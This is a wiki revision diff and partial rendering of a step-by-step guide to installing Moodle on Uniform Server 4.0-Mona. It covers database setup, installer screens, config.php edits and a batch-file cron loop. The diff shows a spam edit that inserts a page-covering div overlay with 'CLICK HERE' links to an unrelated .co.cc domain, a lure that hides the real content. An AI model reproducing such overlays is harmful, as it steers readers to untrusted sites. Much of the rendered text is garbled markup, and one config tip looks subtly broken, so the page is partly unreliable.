Installing Moodle on 4.0-Mona: Difference between revisions
m (→Summary) |
Upazixorys (talk | contribs) No edit summary |
||
Line 1: | Line 1: | ||
< | ---- | ||
{| cellpadding= | <div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;"> | ||
---- | |||
=[http://ecoquvejoz.co.cc UNDER COSTRUCTION, PLEASE SEE THIS POST IN RESERVE COPY]= | |||
---- | |||
=[http://ecoquvejoz.co.cc CLICK HERE]= | |||
---- | |||
</div> | |||
<span id="top"></span> | |||
{| cellpadding="2" | |||
|__TOC__||'''Installing Moodle on 4.0-Mona''' | |__TOC__||'''Installing Moodle on 4.0-Mona''' | ||
|} | |} | ||
Line 12: | Line 20: | ||
{| | {| | ||
|- | |- | ||
|valign= | |valign="top"| | ||
'''''Install Uniform server''''' | '''''Install Uniform server''''' | ||
# '''A)''' Create a new folder named '''moodle_b''' (Can be any name) | # '''A)''' Create a new folder named '''moodle_b''' (Can be any name) | ||
# Extract a new copy of Uniform Server V4.0-Mona to this folder | # Extract a new copy of Uniform Server V4.0-Mona to this folder<br>(Double click on file to extract). | ||
'''''Download Moodle''''' | '''''Download Moodle''''' | ||
<ol start="4"> | |||
<li> '''B)''' Create a new folder '''moodle_a''' (Can be any name its only a temporary folder)</li> | |||
<li> Download the latest version (moodle-weekly-19.zip) of Moodle from [http://download.moodle.org/ Moodle download page]</li> | |||
<li> Copy the file dowloaded ('''moodle-weekly-19.zip''') to '''moodle_a'''</li> | |||
<li> Unzip '''moodle-weekly-19.zip''' into this folder.<br>(Right click on file, select extract all, extract to current path.)</li> | |||
</ol> | |||
'''''Copy files to Uniform Server''''' | '''''Copy files to Uniform Server''''' | ||
<ol start="8"> | |||
<li> '''C)''' Expand the folder '''moodle-weekly-19'''</li> | |||
<li> '''D)''' Copy folder '''moodle''' to Uniform Servers's root folder '''www'''</li> | |||
</ol> | |||
| | | | ||
[[Image:Moodle_1.gif]] | [[Image:Moodle_1.gif]] | ||
Line 39: | Line 47: | ||
{| | {| | ||
|- | |- | ||
|valign= | |valign="top"| | ||
{| | {| | ||
|- | |- | ||
|valign= | |valign="top"| | ||
# Start Uniform Server (Double click on '''Server_Start.bat''' in folder UniServer). | # Start Uniform Server (Double click on '''Server_Start.bat''' in folder UniServer). | ||
# From apanel (displayed in your browser when the server starts) click on the '''phpMyAdmin''' link. (left menu under tools) Note you can always return to apanel by typing | # From apanel (displayed in your browser when the server starts) click on the '''phpMyAdmin''' link. (left menu under tools) Note you can always return to apanel by typing <nowiki>http://localhost/apanel/</nowiki> into your browser address bar. | ||
# '''A)''' We want to create a new database. Enter '''moodle''' | # '''A)''' We want to create a new database. Enter '''moodle''' | ||
# '''B)''' Click on '''Create''' to create the database | # '''B)''' Click on '''Create''' to create the database | ||
|} | |} | ||
|valign= | |valign="top"| | ||
[[Image:Moodle_2.gif]] | [[Image:Moodle_2.gif]] | ||
|} | |} | ||
Line 56: | Line 64: | ||
All that remains is to run the Moodle installer script '''install.php'''. Type the following into your browser address bar. | All that remains is to run the Moodle installer script '''install.php'''. Type the following into your browser address bar. | ||
''' | '''<nowiki>http://localhost/moodle/install.php</nowiki>''' | ||
Most of the pages display information just click either the next or continue button to proceed to the next page. | Most of the pages display information just click either the next or continue button to proceed to the next page. | ||
Line 72: | Line 80: | ||
{| | {| | ||
|- | |- | ||
| ||PHP version|| ||Pass | |&nbsp;&nbsp;&nbsp;||PHP version||&nbsp;||Pass | ||
|- | |- | ||
| ||Session Auto Start|| ||Pass | |&nbsp;||Session Auto Start||&nbsp;||Pass | ||
|- | |- | ||
| ||Magic Quotes Run Time|| ||Pass | |&nbsp;||Magic Quotes Run Time||&nbsp;||Pass | ||
|- | |- | ||
| ||Insecure Handling of Globals|| ||Pass | |&nbsp;||Insecure Handling of Globals||&nbsp;||Pass | ||
|- | |- | ||
| ||Safe Mode|| ||Pass | |&nbsp;||Safe Mode||&nbsp;||Pass | ||
|- | |- | ||
| ||File Uploads|| ||Pass | |&nbsp;||File Uploads||&nbsp;||Pass | ||
|- | |- | ||
| ||GD version|| ||Pass | |&nbsp;||GD version||&nbsp;||Pass | ||
|- | |- | ||
| ||Memory Limit|| ||Pass | |&nbsp;||Memory Limit||&nbsp;||Pass | ||
|} | |} | ||
|- | |- | ||
| | | | ||
3) '''''Please confirm the locations of this Moodle installation'':''' | 3) '''''Please confirm the locations of this Moodle installation'':''' | ||
* Web address | * Web address <nowiki>http://localhost/moodle</nowiki> | ||
* Moodle Directory | * Moodle Directory <nowiki>Z:\www\moodle</nowiki> Grayed out | ||
* Data Directory Z:\/moodledata | * Data Directory Z:\/moodledata | ||
For a default installation of Uniform Server these are correct click '''Next''' | For a default installation of Uniform Server these are correct click '''Next''' | ||
Line 100: | Line 108: | ||
{| | {| | ||
|- | |- | ||
| ||Type:|| ||'''MySQL'''(mysql)|| | |&nbsp;&nbsp;&nbsp;||Type:||&nbsp;||'''MySQL'''(mysql)||&nbsp; | ||
|- | |- | ||
| ||Host Server:|| ||'''localhost'''|| | |&nbsp;||Host Server:||&nbsp;||'''localhost'''||&nbsp; | ||
|- | |- | ||
| ||User:|| || '''root'''|| -- (Uniform Servers default) | |&nbsp;||User:||&nbsp;|| '''root'''|| -- (Uniform Servers default) | ||
|- | |- | ||
| ||Password:|| || '''root'''|| -- (Uniform Server default) | |&nbsp;||Password:||&nbsp;|| '''root'''|| -- (Uniform Server default) | ||
|- | |- | ||
| ||Tables prefix:|| ||''' mdl_'''|| | |&nbsp;||Tables prefix:||&nbsp;||''' mdl_'''||&nbsp; | ||
| | | | ||
|} | |} | ||
Line 117: | Line 125: | ||
{| | {| | ||
|- | |- | ||
|'''Name'''|| ||'''Information'''|| ||'''Report'''|| ||'''Status''' | |'''Name'''||&nbsp;||'''Information'''||&nbsp;||'''Report'''||&nbsp;||'''Status''' | ||
|- | |- | ||
|unicode|| || || ||must be installed and enabled|| ||OK | |unicode||&nbsp;||&nbsp;||&nbsp;||must be installed and enabled||&nbsp;||OK | ||
|- | |- | ||
|database|| ||mysql|| ||version 4.1.16 is required and you are running 5.1.30|| ||OK | |database||&nbsp;||mysql||&nbsp;||version 4.1.16 is required and you are running 5.1.30||&nbsp;||OK | ||
|- | |- | ||
|php|| || || ||version 4.3.0 is required and you are running 5.2.8|| ||OK | |php||&nbsp;||&nbsp;||&nbsp;||version 4.3.0 is required and you are running 5.2.8||&nbsp;||OK | ||
|- | |- | ||
|php_extension|| ||iconv|| ||should be installed and enabled for best results|| ||OK | |php_extension||&nbsp;||iconv||&nbsp;||should be installed and enabled for best results||&nbsp;||OK | ||
|- | |- | ||
|php_extension|| ||mbstring|| ||should be installed and enabled for best results|| ||OK | |php_extension||&nbsp;||mbstring||&nbsp;||should be installed and enabled for best results||&nbsp;||OK | ||
|- | |- | ||
|php_extension|| ||curl|| ||should be installed and enabled for best results|| ||OK | |php_extension||&nbsp;||curl||&nbsp;||should be installed and enabled for best results||&nbsp;||OK | ||
|- | |- | ||
|php_extension|| ||openssl|| ||should be installed and enabled for best results|| ||OK | |php_extension||&nbsp;||openssl||&nbsp;||should be installed and enabled for best results||&nbsp;||OK | ||
|- | |- | ||
|php_extension|| ||tokenizer|| ||should be installed and enabled for best results|| ||OK | |php_extension||&nbsp;||tokenizer||&nbsp;||should be installed and enabled for best results||&nbsp;||OK | ||
|- | |- | ||
|php_extension|| ||xmlrpc|| ||should be installed and enabled for best results|| ||OK | |php_extension||&nbsp;||xmlrpc||&nbsp;||should be installed and enabled for best results||&nbsp;||OK | ||
|- | |- | ||
|php_extension|| ||ctype|| ||should be installed and enabled for best results|| ||OK | |php_extension||&nbsp;||ctype||&nbsp;||should be installed and enabled for best results||&nbsp;||OK | ||
|} | |} | ||
|- | |- | ||
Line 216: | Line 224: | ||
|Prefered language:||English | |Prefered language:||English | ||
|- | |- | ||
|Leave rest blank|| | |Leave rest blank||&nbsp; | ||
|} | |} | ||
Click '''Update profile''' | Click '''Update profile''' | ||
Line 247: | Line 255: | ||
== Starting Moodle == | == Starting Moodle == | ||
# Double click on '''Server_Start.bat''' located in folder '''G:\Uniform Server''' | # Double click on '''Server_Start.bat''' located in folder '''G:\Uniform Server''' | ||
# In your browser address bar type ''' | # In your browser address bar type '''<nowiki>http://localhost/moodle/</nowiki>''' | ||
'''''Note'':''' You can run apanel at any time by typing | '''''Note'':''' You can run apanel at any time by typing <nowiki>http://localhost/apanel</nowiki> into your browser address bar. | ||
'''''[[#top | Top]]''''' | '''''[[#top | Top]]''''' | ||
Line 265: | Line 273: | ||
Its a small file locate the following two lines: | Its a small file locate the following two lines: | ||
<pre> | |||
$CFG- | $CFG->dirroot = 'Z:\www\moodle'; | ||
$CFG- | $CFG->dataroot = 'Z:\/moodledata'; | ||
? | ?> | ||
</pre> | |||
The hard coded paths start with '''Z:''' the solution is to let PHP calculate this drive letter (path) by replacing the above two lines with: | The hard coded paths start with '''Z:''' the solution is to let PHP calculate this drive letter (path) by replacing the above two lines with: | ||
<pre> | |||
$root= substr($_SERVER[ | $root= substr($_SERVER["DOCUMENT_ROOT"],0,-4); | ||
$CFG- | $CFG->dirroot = $root.'\www\moodle'; | ||
$CFG- | $CFG->dataroot = $root.'\/moodledata'; | ||
? | ?> | ||
</pre> | |||
The above change makes Moodle completely portable. | The above change makes Moodle completely portable. | ||
Line 289: | Line 297: | ||
For a personal implementation of Moodle you can run cron.php occasionally by typing the following into your browser address bar: | For a personal implementation of Moodle you can run cron.php occasionally by typing the following into your browser address bar: | ||
''' | '''<nowiki>http://localhost/moodle/admin/cron.php</nowiki>''' | ||
'''''[[#top | Top]]''''' | '''''[[#top | Top]]''''' | ||
Line 300: | Line 308: | ||
UniServer\udrive\www\moodle\admin\'''run_cron.php''' | UniServer\udrive\www\moodle\admin\'''run_cron.php''' | ||
<pre> | |||
<? $dummy = file("http://localhost/moodle/admin/cron.php"); ?> | |||
</pre> | |||
'''''[[#top | Top]]''''' | '''''[[#top | Top]]''''' | ||
Line 310: | Line 318: | ||
UniServer\'''run_cron.bat''' | UniServer\'''run_cron.bat''' | ||
<pre> | |||
:next | :next | ||
udrive\home\admin\program\unidelay.exe 60 | udrive\home\admin\program\unidelay.exe 60 | ||
Line 316: | Line 324: | ||
goto :next | goto :next | ||
exit | exit | ||
</pre> | |||
'''''[[#top | Top]]''''' | '''''[[#top | Top]]''''' | ||
Line 324: | Line 332: | ||
UniServer\'''run_cron_hidden.bat''' | UniServer\'''run_cron_hidden.bat''' | ||
<pre> | |||
start udrive\home\admin\program\uniserv.exe run_cron.bat | start udrive\home\admin\program\uniserv.exe run_cron.bat | ||
</pre> | |||
With the files in place start the servers and run '''run_cron_hidden.bat'''. | With the files in place start the servers and run '''run_cron_hidden.bat'''. | ||
Line 333: | Line 341: | ||
'''''Note 2'':''' You can run Cron from '''Server_Start.bat''' add the following line just below line ''':END''' (forth line from bottom of file): | '''''Note 2'':''' You can run Cron from '''Server_Start.bat''' add the following line just below line ''':END''' (forth line from bottom of file): | ||
<pre> | |||
start udrive\home\admin\program\uniserv.exe run_cron.bat | start udrive\home\admin\program\uniserv.exe run_cron.bat | ||
</pre> | |||
Hence every time you start the servers using '''Server_Start.bat''' or '''disk_start.vbs''' Cron will run. | Hence every time you start the servers using '''Server_Start.bat''' or '''disk_start.vbs''' Cron will run. | ||
Line 350: | Line 358: | ||
I lifted the following tip straight from [http://www.teachageek.com/2009/03/uniform-server-revisited.html '''gdunc'''] blog, it looks very useful, reproduced unedited: | I lifted the following tip straight from [http://www.teachageek.com/2009/03/uniform-server-revisited.html '''gdunc'''] blog, it looks very useful, reproduced unedited: | ||
One other thing that might be useful to add here is a small addition to the config.php file for those users who use UniServer on a laptop. Since the '''config.php''' file lists the wwwroot as | One other thing that might be useful to add here is a small addition to the config.php file for those users who use UniServer on a laptop. Since the '''config.php''' file lists the wwwroot as "localhost" external users are unable to view your moodle site correctly. For that reason, I would recommend the following changes to config.php: | ||
Locate the 'wwwroot' line in '''config.php''' | Locate the 'wwwroot' line in '''config.php''' | ||
<pre> | |||
$CFG- | $CFG->wwwroot = 'http://localhost/moodle'; | ||
</pre> | |||
Replace the above line with the following two lines, to let php figure out what your current IP address is and change it whenever your IP address changes. This can be very useful when moving from event to event. | Replace the above line with the following two lines, to let php figure out what your current IP address is and change it whenever your IP address changes. This can be very useful when moving from event to event. | ||
<pre> | |||
$domain = GetHostByName($REMOTE_ADDR); | $domain = GetHostByName($REMOTE_ADDR); | ||
$CFG- | $CFG->wwwroot = 'http://'.$domain.'/moodle'; | ||
</pre> | |||
'''''[[#top | Top]]''''' | '''''[[#top | Top]]''''' |
Revision as of 06:15, 24 November 2010
<span id="top"></span>
Installing Moodle on 4.0-Mona |
Introduction
This step-by-step guide shows how to install Moodle on Uniform Server V4.0-Mona. In addition shows how to resolve fixed paths allowing Moodle to be run from a USB memory stick.
Windows does not support true cron jobs hence I have included a portable-cron solution catering for both hard drive and USB memory stick installations.
Pre-Installation
Install Uniform server
Download Moodle <ol start="4"> <li> B) Create a new folder moodle_a (Can be any name its only a temporary folder)</li> <li> Download the latest version (moodle-weekly-19.zip) of Moodle from Moodle download page</li> <li> Copy the file dowloaded (moodle-weekly-19.zip) to moodle_a</li> <li> Unzip moodle-weekly-19.zip into this folder.<br>(Right click on file, select extract all, extract to current path.)</li> </ol> Copy files to Uniform Server <ol start="8"> <li> C) Expand the folder moodle-weekly-19</li> <li> D) Copy folder moodle to Uniform Servers's root folder www</li> </ol> |
Create a Moodle Database
Creating the Moodle database is straight forward, tables are automatically inserted during installation
|
Moodle Installation
All that remains is to run the Moodle installer script install.php. Type the following into your browser address bar.
<nowiki>http://localhost/moodle/install.php</nowiki>
Most of the pages display information just click either the next or continue button to proceed to the next page. Item 4 requires the database user name and password for a personal installation we are using the defaults root and root. The following shows what to expect during installation:
1) Choose a Language: Select your language e.g. English (en) click Next | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
2) Checking your PHP Settings: passes all click NEXT Your server should pass all these tests to make Moodle run properly
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
3) Please confirm the locations of this Moodle installation:
For a default installation of Uniform Server these are correct click Next | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
4) Database configuration:
Click Next | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
5) Checking your environment:
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
6) Download language pack Installation: Option to download a language pack NEXT | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
7) Configuration completed: config.php has been successfully created Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
8) GPL License: You have read the copyright notice! YES | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
9) Current release information: Moodle 1.9.4+ (Build: 20090204)(leave Unattended operation un-checked): Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
10) Setting up database: Takes some time wait as the install takes place: Database was successfully updated Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
11) Setting up module tables: Again wait, Workshop tables have been setup correctly Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
12) Setting up plugin tables: Truefalse tables have been set up correctly, Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
13) Upgrading database: Datbase was successfully upgraded Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
14) Upgrading database: Blocks version is now 2007081300 Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
15) Setting up block tables: Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
16) Setting up plugin tables: Paypal tables have been set up correctley Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
17) Setting up plugin tables: xml and other plugins set up correctly Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
18) Setting up plugin tables: xml tables have been set up correctly Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
19) Setting up plugin tables: user tables have been set up correctly Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
20) Setting up plugin tables: stats tables have been set up correctly Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
21) Setting up plugin tables: unittest tables have been set up correctly Continue | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
22) Setup administrator account: Admin set-up: On this page you should configure your main administrator account which will have complete control over the site. Make sure you give it a secure user name and password as well as a valid email address. You can create more admin accounts later on. Fill in details:
Click Update profile | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
23) Front Page settings: This page allows you to configure the front page and name of this new site. You can come back here later to change these settings any time using the Administration menus. Fill in details:
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
24) Finished: This is your main admin page you can continue setting up Moodle or log out |
Note: Steps 22-23 I entered dummy information. You can change this information from admin at any time, however make sure you remember your admin password and name.
Stopping Moodle
- Logout from admin
- Double click on Stop.bat located in folder G:\Uniform Server
Starting Moodle
- Double click on Server_Start.bat located in folder G:\Uniform Server
- In your browser address bar type <nowiki>http://localhost/moodle/</nowiki>
Note: You can run apanel at any time by typing <nowiki>http://localhost/apanel</nowiki> into your browser address bar.
Portability Memory Stick
To run Moodle from a Memory stick, copy the folder UniServer and all its content to whatever drive your memory stick is on.
Note: This process is not fast; writing 102 MB (UniServer plus Moodle) took just over 20 minutes. In the same vain do not expect exceptional performance, Moodle uses a large database hence is slow when run from a memory stick. That said I found it just about acceptable.
Hard Coded path
During installation Moodle uses the drive letter (default Z) it is installed from and hard wires it into a configuration file. This means you cannot run or move the installation and expect Moodle to run. A solution to this problem requires modifying the Moodle configuration file config.php.
Open the following file in a text editor:
UniServer\udrive\www\moodle\config.php
Its a small file locate the following two lines: <pre> $CFG->dirroot = 'Z:\www\moodle'; $CFG->dataroot = 'Z:\/moodledata'; ?> </pre> The hard coded paths start with Z: the solution is to let PHP calculate this drive letter (path) by replacing the above two lines with: <pre> $root= substr($_SERVER["DOCUMENT_ROOT"],0,-4); $CFG->dirroot = $root.'\www\moodle'; $CFG->dataroot = $root.'\/moodledata'; ?> </pre> The above change makes Moodle completely portable.
Cron
Moodle has a cron.php script that needs to be periodically run. It takes care of various routine tasks for example unsubscribing inactive members and sending out email messages.
Manualy Run Cron
To keep Moodle happy you need to periodically run the cron.php script.
For a personal implementation of Moodle you can run cron.php occasionally by typing the following into your browser address bar:
<nowiki>http://localhost/moodle/admin/cron.php</nowiki>
Automatically Run Cron
Manually running Cron can become tedious a solution is to create a portable-cron using 4.0_Mona components, three new files are required as follows:
run_cron.php
This file runs the actual cron script cron.php its sole purpose is to convert local paths to server relative paths.
UniServer\udrive\www\moodle\admin\run_cron.php <pre> <? $dummy = file("http://localhost/moodle/admin/cron.php%22); ?> </pre>
run_cron.bat
This batch file uses unidelay.exe to provide a periodic tick. At the end of each delay PHP is run in CLI mode and runs script run_cron.php. the loop repeats indefinitely.
UniServer\run_cron.bat <pre>
- next
udrive\home\admin\program\unidelay.exe 60 udrive\usr\local\php\php.exe -n udrive\www\moodle\admin\run_cron.php goto :next exit </pre>
The above batch file if run directly would be visible hence this batch file uses uniserv.exe to run the above hidden.
UniServer\run_cron_hidden.bat <pre> start udrive\home\admin\program\uniserv.exe run_cron.bat </pre>
With the files in place start the servers and run run_cron_hidden.bat.
Note 1: unidelay.exe 60 runs the cron-job every 60 seconds increase this as required.
Note 2: You can run Cron from Server_Start.bat add the following line just below line :END (forth line from bottom of file): <pre> start udrive\home\admin\program\uniserv.exe run_cron.bat </pre> Hence every time you start the servers using Server_Start.bat or disk_start.vbs Cron will run.
Related links:
Tip - UniServer on a laptop
I lifted the following tip straight from gdunc blog, it looks very useful, reproduced unedited:
One other thing that might be useful to add here is a small addition to the config.php file for those users who use UniServer on a laptop. Since the config.php file lists the wwwroot as "localhost" external users are unable to view your moodle site correctly. For that reason, I would recommend the following changes to config.php:
Locate the 'wwwroot' line in config.php <pre> $CFG->wwwroot = 'http://localhost/moodle'; </pre> Replace the above line with the following two lines, to let php figure out what your current IP address is and change it whenever your IP address changes. This can be very useful when moving from event to event. <pre> $domain = GetHostByName($REMOTE_ADDR); $CFG->wwwroot = 'http://'.$domain.'/moodle'; </pre>
Summary
Although there are a large number of steps Moodle is easy to install on Uniform Server.